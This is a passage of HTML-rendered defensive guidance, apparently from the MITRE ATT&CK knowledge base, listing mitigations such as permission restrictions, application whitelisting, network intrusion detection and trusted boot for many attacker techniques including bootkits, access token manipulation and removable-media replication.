<p>Since StartupItems are deprecated, preventing all users from writing to the &lt;code&gt;/Library/StartupItems&lt;/code&gt; directory would prevent any startup items from getting registered. Similarly, appropriate permissions should be applied such that only specific users can edit the startup items so that they cant be leveraged for privilege escalation.</p>
</div>
</div>
<div class="sect2">
<h3 id="_launch_daemon_mitigation"><a class="anchor" href="#_launch_daemon_mitigation"></a><a class="link" href="#_launch_daemon_mitigation">Launch Daemon Mitigation</a></h3>
<div class="paragraph">
<p>Limit privileges of user accounts and remediate Privilege Escalation vectors so only authorized administrators can create new Launch Daemons.</p>
</div>
</div>
<div class="sect2">
<h3 id="_local_port_monitor_mitigation"><a class="anchor" href="#_local_port_monitor_mitigation"></a><a class="link" href="#_local_port_monitor_mitigation">Local Port Monitor Mitigation</a></h3>
<div class="paragraph">
<p>Identify and block potentially malicious software that may persist in this manner by using whitelisting[[CiteRef::Beechey 2010]] tools capable of monitoring DLL loads by processes running under SYSTEM permissions.</p>
</div>
</div>
<div class="sect2">
<h3 id="_accessibility_features_mitigation"><a class="anchor" href="#_accessibility_features_mitigation"></a><a class="link" href="#_accessibility_features_mitigation">Accessibility Features Mitigation</a></h3>
<div class="paragraph">
<p>To use this technique remotely, an adversary must use it in conjunction with RDP. Ensure that Network Level Authentication is enabled to force the remote desktop session to authenticate before the session is created and the login screen displayed. It is enabled by default on Windows Vista and later.[[CiteRef::TechNet RDP NLA]]</p>
</div>
<div class="paragraph">
<p>If possible, use a Remote Desktop Gateway to manage connections and security configuration of RDP within a network.[[CiteRef::TechNet RDP Gateway]]</p>
</div>
<div class="paragraph">
<p>Identify and block potentially malicious software that may be executed by an adversary with this technique by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_bootkit_mitigation"><a class="anchor" href="#_bootkit_mitigation"></a><a class="link" href="#_bootkit_mitigation">Bootkit Mitigation</a></h3>
<div class="paragraph">
<p>Ensure proper permissions are in place to help prevent adversary access to privileged accounts necessary to perform this action. Use Trusted Platform Module technology and a secure or trusted boot process to prevent system integrity from being compromised.[[CiteRef::TCG Trusted Platform Module]][[CiteRef::TechNet Secure Boot Process]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_access_token_manipulation_mitigation"><a class="anchor" href="#_access_token_manipulation_mitigation"></a><a class="link" href="#_access_token_manipulation_mitigation">Access Token Manipulation Mitigation</a></h3>
<div class="paragraph">
<p>Access tokens are an integral part of the security system within Windows and cannot be turned off. However, an attacker must already have administrator level access on the local system to make full use of this technique; be sure to restrict users and accounts to the least privileges they require to do their job.</p>
</div>
<div class="paragraph">
<p>Any user can also spoof access tokens if they have legitimate credentials. Follow mitigation guidelines for preventing adversary use of [[Technique/T1078|Valid Accounts]].</p>
</div>
<div class="paragraph">
<p>Also limit opportunities for adversaries to increase privileges by limiting [[Privilege Escalation]] opportunities.</p>
</div>
</div>
<div class="sect2">
<h3 id="_valid_accounts_mitigation"><a class="anchor" href="#_valid_accounts_mitigation"></a><a class="link" href="#_valid_accounts_mitigation">Valid Accounts Mitigation</a></h3>
<div class="paragraph">
<p>Take measures to detect or prevent techniques such as [[Technique/T1003|Credential Dumping]] or installation of keyloggers to acquire credentials through [[Technique/T1056|Input Capture]]. Limit credential overlap across systems to prevent access if account credentials are obtained. Ensure that local administrator accounts have complex, unique passwords across all systems on the network. Do not put user or admin domain accounts in the local administrator groups across systems unless they are tightly controlled and use of accounts is segmented, as this is often equivalent to having a local administrator account with the same password on all systems. Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers.[[CiteRef::Microsoft Securing Privileged Access]]. Audit domain and local accounts as well as their permission levels routinely to look for situations that could allow an adversary to gain wide access by obtaining credentials of a privileged account.[[CiteRef::TechNet Credential Theft]][[CiteRef::TechNet Least Privilege]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_disabling_security_tools_mitigation"><a class="anchor" href="#_disabling_security_tools_mitigation"></a><a class="link" href="#_disabling_security_tools_mitigation">Disabling Security Tools Mitigation</a></h3>
<div class="paragraph">
<p>Ensure proper process, registry, and file permissions are in place to prevent adversaries from disabling or interfering with security services.</p>
</div>
</div>
<div class="sect2">
<h3 id="_query_registry_mitigation"><a class="anchor" href="#_query_registry_mitigation"></a><a class="link" href="#_query_registry_mitigation">Query Registry Mitigation</a></h3>
<div class="paragraph">
<p>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information within the Registry, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_system_firmware_mitigation"><a class="anchor" href="#_system_firmware_mitigation"></a><a class="link" href="#_system_firmware_mitigation">System Firmware Mitigation</a></h3>
<div class="paragraph">
<p>Prevent adversary access to privileged accounts or access necessary to perform this technique. Check the integrity of the existing BIOS or EFI to determine if it is vulnerable to modification. Patch the BIOS and EFI as necessary. Use Trusted Platform Module technology.[[CiteRef::TCG Trusted Platform Module]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_multiband_communication_mitigation"><a class="anchor" href="#_multiband_communication_mitigation"></a><a class="link" href="#_multiband_communication_mitigation">Multiband Communication Mitigation</a></h3>
<div class="paragraph">
<p>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools.[[CiteRef::University of Birmingham C2]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_remote_system_discovery_mitigation"><a class="anchor" href="#_remote_system_discovery_mitigation"></a><a class="link" href="#_remote_system_discovery_mitigation">Remote System Discovery Mitigation</a></h3>
<div class="paragraph">
<p>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information on remotely available systems, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_file_and_directory_discovery_mitigation"><a class="anchor" href="#_file_and_directory_discovery_mitigation"></a><a class="link" href="#_file_and_directory_discovery_mitigation">File and Directory Discovery Mitigation</a></h3>
<div class="paragraph">
<p>File system activity is a common part of an operating system, so it is unlikely that mitigation would be appropriate for this technique. It may still be beneficial to identify and block unnecessary system utilities or potentially malicious software by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_file_system_permissions_weakness_mitigation"><a class="anchor" href="#_file_system_permissions_weakness_mitigation"></a><a class="link" href="#_file_system_permissions_weakness_mitigation">File System Permissions Weakness Mitigation</a></h3>
<div class="paragraph">
<p>Use auditing tools capable of detecting file system permissions abuse opportunities on systems within an enterprise and correct them. Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service binary target path locations. Toolkits like the PowerSploit framework contain PowerUp modules that can be used to explore systems for service file system permissions weaknesses.<a id="CiteRef::Powersploit"></a></p>
</div>
<div class="paragraph">
<p>Identify and block potentially malicious software that may be executed through abuse of file, directory, and service permissions by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] that are capable of auditing and/or blocking unknown programs. Deny execution from user directories such as file download directories and temp directories where able.[[CiteRef::Seclists Kanthak 7zip Installer]]</p>
</div>
<div class="paragraph">
<p>Turn off UAC&#8217;s privilege elevation for standard users and installer detection for all users by modifying registry key
&lt;code&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]&lt;/code&gt;to automatically deny elevation requests, add: &lt;code&gt;"ConsentPromptBehaviorUser"=dword:00000000&lt;/code&gt;; to disable installer detection, add: &lt;code&gt;"EnableInstallerDetection"=dword:00000000&lt;/code&gt;.[[CiteRef::Seclists Kanthak 7zip Installer]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_service_execution_mitigation"><a class="anchor" href="#_service_execution_mitigation"></a><a class="link" href="#_service_execution_mitigation">Service Execution Mitigation</a></h3>
<div class="paragraph">
<p>Ensure that permissions disallow services that run at a higher permissions level from being created or interacted with by a user with a lower permission level. Also ensure that high permission level service binaries cannot be replaced or modified by users with a lower permission level.</p>
</div>
<div class="paragraph">
<p>Identify unnecessary system utilities or potentially malicious software that may be used to interact with Windows services, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_communication_through_removable_media_mitigation"><a class="anchor" href="#_communication_through_removable_media_mitigation"></a><a class="link" href="#_communication_through_removable_media_mitigation">Communication Through Removable Media Mitigation</a></h3>
<div class="paragraph">
<p>Disable Autorun if it is unnecessary.[[CiteRef::Microsoft Disable Autorun]] Disallow or restrict removable media at an organizational policy level if they are not required for business operations.[[CiteRef::TechNet Removable Media Control]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_two_factor_authentication_interception_mitigation"><a class="anchor" href="#_two_factor_authentication_interception_mitigation"></a><a class="link" href="#_two_factor_authentication_interception_mitigation">Two-Factor Authentication Interception Mitigation</a></h3>
<div class="paragraph">
<p>Remove smart cards when not in use. Protect devices and services used to transmit and receive out-of-band codes.</p>
</div>
<div class="paragraph">
<p>Identify and block potentially malicious software that may be used to intercept 2FA credentials on a system by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_plist_modification_mitigation"><a class="anchor" href="#_plist_modification_mitigation"></a><a class="link" href="#_plist_modification_mitigation">Plist Modification Mitigation</a></h3>
<div class="paragraph">
<p>Prevent plist files from being modified by users by making them read-only.</p>
</div>
</div>
<div class="sect2">
<h3 id="_application_shimming_mitigation"><a class="anchor" href="#_application_shimming_mitigation"></a><a class="link" href="#_application_shimming_mitigation">Application Shimming Mitigation</a></h3>
<div class="paragraph">
<p>There currently aren&#8217;t a lot of ways to mitigate application shimming. Disabling the Shim Engine isn&#8217;t recommended because Windows depends on shimming for interoperability and software may become unstable or not work. Microsoft released an optional patch update - KB3045645 - that will remove the "auto-elevate" flag within the sdbinst.exe. This will prevent use of application shimming to bypass UAC.</p>
</div>
<div class="paragraph">
<p>Changing UAC settings to "Always Notify" will give the user more visibility when UAC elevation is requested, however, this option will not be popular among users due to the constant UAC interruptions.</p>
</div>
</div>
<div class="sect2">
<h3 id="_standard_non_application_layer_protocol_mitigation"><a class="anchor" href="#_standard_non_application_layer_protocol_mitigation"></a><a class="link" href="#_standard_non_application_layer_protocol_mitigation">Standard Non-Application Layer Protocol Mitigation</a></h3>
<div class="paragraph">
<p>Properly configure firewalls and proxies to limit outgoing traffic to only necessary ports and through proper network gateway systems.</p>
</div>
<div class="paragraph">
<p>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools.[[CiteRef::University of Birmingham C2]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_data_transfer_size_limits_mitigation"><a class="anchor" href="#_data_transfer_size_limits_mitigation"></a><a class="link" href="#_data_transfer_size_limits_mitigation">Data Transfer Size Limits Mitigation</a></h3>
<div class="paragraph">
<p>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary command and control infrastructure and malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool command and control signatures over time or construct protocols in such a way to avoid detection by common defensive tools.[[CiteRef::University of Birmingham C2]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_appinit_dlls_mitigation"><a class="anchor" href="#_appinit_dlls_mitigation"></a><a class="link" href="#_appinit_dlls_mitigation">AppInit DLLs Mitigation</a></h3>
<div class="paragraph">
<p>Upgrade to Windows 8 or later and enable secure boot.</p>
</div>
<div class="paragraph">
<p>Identify and block potentially malicious software that may be executed through AppInit DLLs by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] that are capable of auditing and/or blocking unknown DLLs.</p>
</div>
</div>
<div class="sect2">
<h3 id="_installutil_mitigation"><a class="anchor" href="#_installutil_mitigation"></a><a class="link" href="#_installutil_mitigation">InstallUtil Mitigation</a></h3>
<div class="paragraph">
<p>InstallUtil may not be necessary within a given environment. Use application whitelisting configured to block execution of InstallUtil.exe if it is not required for a given system or network to prevent potential misuse by adversaries.</p>
</div>
</div>
<div class="sect2">
<h3 id="_shortcut_modification_mitigation"><a class="anchor" href="#_shortcut_modification_mitigation"></a><a class="link" href="#_shortcut_modification_mitigation">Shortcut Modification Mitigation</a></h3>
<div class="paragraph">
<p>Identify and block unknown, potentially malicious software that may be executed through shortcut modification by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_custom_command_and_control_protocol_mitigation"><a class="anchor" href="#_custom_command_and_control_protocol_mitigation"></a><a class="link" href="#_custom_command_and_control_protocol_mitigation">Custom Command and Control Protocol Mitigation</a></h3>
<div class="paragraph">
<p>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools.[[CiteRef::University of Birmingham C2]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_automated_exfiltration_mitigation"><a class="anchor" href="#_automated_exfiltration_mitigation"></a><a class="link" href="#_automated_exfiltration_mitigation">Automated Exfiltration Mitigation</a></h3>
<div class="paragraph">
<p>Identify unnecessary system utilities, scripts, or potentially malicious software that may be used to transfer data outside of a network, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_change_default_file_association_mitigation"><a class="anchor" href="#_change_default_file_association_mitigation"></a><a class="link" href="#_change_default_file_association_mitigation">Change Default File Association Mitigation</a></h3>
<div class="paragraph">
<p>Direct mitigation of this technique is not recommended since it is a legitimate function that can be performed by users for software preferences. Follow Microsoft&#8217;s best practices for file associations.[[CiteRef::MSDN File Associations]]</p>
</div>
<div class="paragraph">
<p>Identify and block potentially malicious software that may be executed by this technique using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_peripheral_device_discovery_mitigation"><a class="anchor" href="#_peripheral_device_discovery_mitigation"></a><a class="link" href="#_peripheral_device_discovery_mitigation">Peripheral Device Discovery Mitigation</a></h3>
<div class="paragraph">
<p>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about peripheral devices, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_standard_application_layer_protocol_mitigation"><a class="anchor" href="#_standard_application_layer_protocol_mitigation"></a><a class="link" href="#_standard_application_layer_protocol_mitigation">Standard Application Layer Protocol Mitigation</a></h3>
<div class="paragraph">
<p>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and will be different across various malware families and versions. Adversaries will likely change tool signatures over time or construct protocols in such a way to avoid detection by common defensive tools.[[CiteRef::University of Birmingham C2]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_cron_job_mitigation"><a class="anchor" href="#_cron_job_mitigation"></a><a class="link" href="#_cron_job_mitigation">Cron Job Mitigation</a></h3>
<div class="paragraph">
<p>Limit privileges of user accounts and remediate Privilege Escalation vectors so only authorized users can create scheduled tasks. Identify and block unnecessary system utilities or potentially malicious software that may be used to schedule tasks using whitelisting tools.</p>
</div>
</div>
<div class="sect2">
<h3 id="_input_capture_mitigation"><a class="anchor" href="#_input_capture_mitigation"></a><a class="link" href="#_input_capture_mitigation">Input Capture Mitigation</a></h3>
<div class="paragraph">
<p>Identify and block potentially malicious software that may be used to acquire credentials or information from the user by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
<div class="paragraph">
<p>In cases where this behavior is difficult to detect or mitigate, efforts can be made to lessen some of the impact that might result from an adversary acquiring credential information. It is also good practice to follow mitigation recommendations for adversary use of [[Technique/T1078|Valid Accounts]].</p>
</div>
</div>
<div class="sect2">
<h3 id="_launchctl_mitigation"><a class="anchor" href="#_launchctl_mitigation"></a><a class="link" href="#_launchctl_mitigation">Launchctl Mitigation</a></h3>
<div class="paragraph">
<p>Prevent users from installing their own launch agents or launch daemons and instead require them to be pushed out by group policy.</p>
</div>
</div>
<div class="sect2">
<h3 id="_security_support_provider_mitigation"><a class="anchor" href="#_security_support_provider_mitigation"></a><a class="link" href="#_security_support_provider_mitigation">Security Support Provider Mitigation</a></h3>
<div class="paragraph">
<p>Windows 8.1, Windows Server 2012 R2, and later versions may make LSA run as a Protected Process Light (PPL) by setting the Registry key &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL&lt;/code&gt;, which requires all SSP DLLs to be signed by Microsoft.[[CiteRef::Graeber 2014]][[CiteRef::Microsoft Configure LSA]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_process_discovery_mitigation"><a class="anchor" href="#_process_discovery_mitigation"></a><a class="link" href="#_process_discovery_mitigation">Process Discovery Mitigation</a></h3>
<div class="paragraph">
<p>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about processes, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_deobfuscate_decode_files_or_information_mitigation"><a class="anchor" href="#_deobfuscate_decode_files_or_information_mitigation"></a><a class="link" href="#_deobfuscate_decode_files_or_information_mitigation">Deobfuscate/Decode Files or Information Mitigation</a></h3>
<div class="paragraph">
<p>Identify unnecessary system utilities or potentially malicious software that may be used to deobfuscate or decode files or information, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_replication_through_removable_media_mitigation"><a class="anchor" href="#_replication_through_removable_media_mitigation"></a><a class="link" href="#_replication_through_removable_media_mitigation">Replication Through Removable Media Mitigation</a></h3>
<div class="paragraph">
<p>Disable Autorun if it is unnecessary.[[CiteRef::Microsoft Disable Autorun]] Disallow or restrict removable media at an organizational policy level if it is not required for business operations.[[CiteRef::TechNet Removable Media Control]]</p>
</div>
<div class="paragraph">
<p>Identify potentially malicious software that may be used to infect removable media or may result from tainted removable media, and audit and/or block it by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_scheduled_transfer_mitigation"><a class="anchor" href="#_scheduled_transfer_mitigation"></a><a class="link" href="#_scheduled_transfer_mitigation">Scheduled Transfer Mitigation</a></h3>
<div class="paragraph">
<p>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary command and control infrastructure and malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool command and control signatures over time or construct protocols in such a way to avoid detection by common defensive tools.[[CiteRef::University of Birmingham C2]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_hypervisor_mitigation"><a class="anchor" href="#_hypervisor_mitigation"></a><a class="link" href="#_hypervisor_mitigation">Hypervisor Mitigation</a></h3>
<div class="paragraph">
<p>Prevent adversary access to privileged accounts necessary to install a hypervisor.</p>
</div>
</div>
<div class="sect2">
<h3 id="_automated_collection_mitigation"><a class="anchor" href="#_automated_collection_mitigation"></a><a class="link" href="#_automated_collection_mitigation">Automated Collection Mitigation</a></h3>
<div class="paragraph">
<p>Encryption and off-system storage of sensitive information may be one way to mitigate collection of files, but may not stop an adversary from acquiring the information if an intrusion persists over a long period of time and the adversary is able to discover and access the data through other means. A keylogger installed on a system may be able to intercept passwords through [[Technique/T1056|Input Capture]] and be used to decrypt protected documents that an adversary may have collected. Strong passwords should be used to prevent offline cracking of encrypted documents through [[Technique/T1110|Brute Force]] techniques.</p>
</div>
<div class="paragraph">
<p>Identify unnecessary system utilities, third-party tools, or potentially malicious software that may be used to collect files and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_exfiltration_over_physical_medium_mitigation"><a class="anchor" href="#_exfiltration_over_physical_medium_mitigation"></a><a class="link" href="#_exfiltration_over_physical_medium_mitigation">Exfiltration Over Physical Medium Mitigation</a></h3>
<div class="paragraph">
<p>Disable Autorun if it is unnecessary.[[CiteRef::Microsoft Disable Autorun]] Disallow or restrict removable media at an organizational policy level if they are not required for business operations.[[CiteRef::TechNet Removable Media Control]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_data_encoding_mitigation"><a class="anchor" href="#_data_encoding_mitigation"></a><a class="link" href="#_data_encoding_mitigation">Data Encoding Mitigation</a></h3>
<div class="paragraph">
<p>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools.[[CiteRef::University of Birmingham C2]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_dll_side_loading_mitigation"><a class="anchor" href="#_dll_side_loading_mitigation"></a><a class="link" href="#_dll_side_loading_mitigation">DLL Side-Loading Mitigation</a></h3>
<div class="paragraph">
<p>Update software regularly. Install software in write-protected locations. Use the program sxstrace.exe that is included with Windows along with manual inspection to check manifest files for side-loading vulnerabilities in software.</p>
</div>
</div>
<div class="sect2">
<h3 id="_rootkit_mitigation"><a class="anchor" href="#_rootkit_mitigation"></a><a class="link" href="#_rootkit_mitigation">Rootkit Mitigation</a></h3>
<div class="paragraph">
<p>Identify potentially malicious software that may contain rootkit functionality, and audit and/or block it by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_network_share_discovery_mitigation"><a class="anchor" href="#_network_share_discovery_mitigation"></a><a class="link" href="#_network_share_discovery_mitigation">Network Share Discovery Mitigation</a></h3>
<div class="paragraph">
<p>Identify unnecessary system utilities or potentially malicious software that may be used to acquire network share information, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_modify_registry_mitigation"><a class="anchor" href="#_modify_registry_mitigation"></a><a class="link" href="#_modify_registry_mitigation">Modify Registry Mitigation</a></h3>
<div class="paragraph">
<p>Identify and block unnecessary system utilities or potentially malicious software that may be used to modify the Registry by using whitelisting[[CiteRef::Beechey 2010]] tools like AppLocker[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_system_time_discovery_mitigation"><a class="anchor" href="#_system_time_discovery_mitigation"></a><a class="link" href="#_system_time_discovery_mitigation">System Time Discovery Mitigation</a></h3>
<div class="paragraph">
<p>Benign software uses legitimate processes to gather system time. Efforts should be focused on preventing unwanted or unknown code from executing on a system. Some common tools, such as net.exe, may be blocked by policy to prevent common ways of acquiring remote system time.</p>
</div>
<div class="paragraph">
<p>Identify unnecessary system utilities or potentially malicious software that may be used to acquire system time information, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_system_network_connections_discovery_mitigation"><a class="anchor" href="#_system_network_connections_discovery_mitigation"></a><a class="link" href="#_system_network_connections_discovery_mitigation">System Network Connections Discovery Mitigation</a></h3>
<div class="paragraph">
<p>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about network connections, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_setuid_and_setgid_mitigation"><a class="anchor" href="#_setuid_and_setgid_mitigation"></a><a class="link" href="#_setuid_and_setgid_mitigation">Setuid and Setgid Mitigation</a></h3>
<div class="paragraph">
<p>Applications with known vulnerabilities or known shell escapes should not have the setuid or setgid bits set to reduce potential damage if an application is compromised.</p>
</div>
</div>
<div class="sect2">
<h3 id="_clear_command_history_mitigation"><a class="anchor" href="#_clear_command_history_mitigation"></a><a class="link" href="#_clear_command_history_mitigation">Clear Command History Mitigation</a></h3>
<div class="dlist">
<dl>
<dt class="hdlist1">Preventing users from deleting or writing to certain files can stop adversaries from maliciously altering their &lt;code&gt;~/.bash_history&lt;/code&gt; files. Additionally, making these environment variables readonly can make sure that the history is preserved [[CiteRef</dt>
<dd>
<p>Securing bash history]].</p>
</dd>
</dl>
</div>
</div>
<div class="sect2">
<h3 id="_screen_capture_mitigation"><a class="anchor" href="#_screen_capture_mitigation"></a><a class="link" href="#_screen_capture_mitigation">Screen Capture Mitigation</a></h3>
<div class="paragraph">
<p>Blocking software based on screen capture functionality may be difficult, and there may be legitimate software that performs those actions. Instead, identify potentially malicious software that may have functionality to acquire screen captures, and audit and/or block it by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_windows_admin_shares_mitigation"><a class="anchor" href="#_windows_admin_shares_mitigation"></a><a class="link" href="#_windows_admin_shares_mitigation">Windows Admin Shares Mitigation</a></h3>
<div class="paragraph">
<p>Do not reuse local administrator account passwords across systems. Ensure password complexity and uniqueness such that the passwords cannot be cracked or guessed. Deny remote use of local admin credentials to log into systems. Do not allow domain user accounts to be in the local Administrators group multiple systems.</p>
